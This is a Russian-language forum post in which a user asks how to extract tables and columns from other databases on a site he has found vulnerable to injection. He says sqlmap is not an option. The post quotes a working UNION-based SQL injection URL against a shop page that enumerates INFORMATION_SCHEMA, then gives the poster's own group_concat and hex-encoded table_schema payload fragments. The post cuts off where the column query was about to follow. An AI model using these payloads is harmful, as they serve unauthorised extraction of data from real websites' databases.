
11.11.2017, 19:03
|
|
Участник форума
Регистрация: 30.07.2011
Сообщений: 151
С нами:
7782806
Репутация:
0
|
|
Вопрос такой.
Есть иньекция на сайте. Таблицы выдергиваются из базы "А".
На сервере под одним пользователем крутиться 3 базы: А. Б.С.
Как составить запрос, чтобы можно выдернуть таблицы, колонки из базы Б и С?
Так берутся данные из базы А.
Сообщение от None
http://site/shop.php?id=-260+union+select+1,2,3,4,5,table_name,7,8,9,10,11, 12,13,14 FROM INFORMATION_SCHEMA.TABLES --
sqlmap не советуйте, сервер настроен так, что надо ручками.
Когда я написал этот пост я не остановился. Я стал искать дальше и выяснил, что это можно сделать следующим запросом:
group_concat(table_name+SEPARATOR+0x0b) - выводит список таблиц
FROM%20information_schema.tables%20WHERE%20table_s chema=0x6372%20-- - откуда брать таблицы.
ЗаHEXованная строчка - это название базы данных.
ну и колонки это:
|
|
|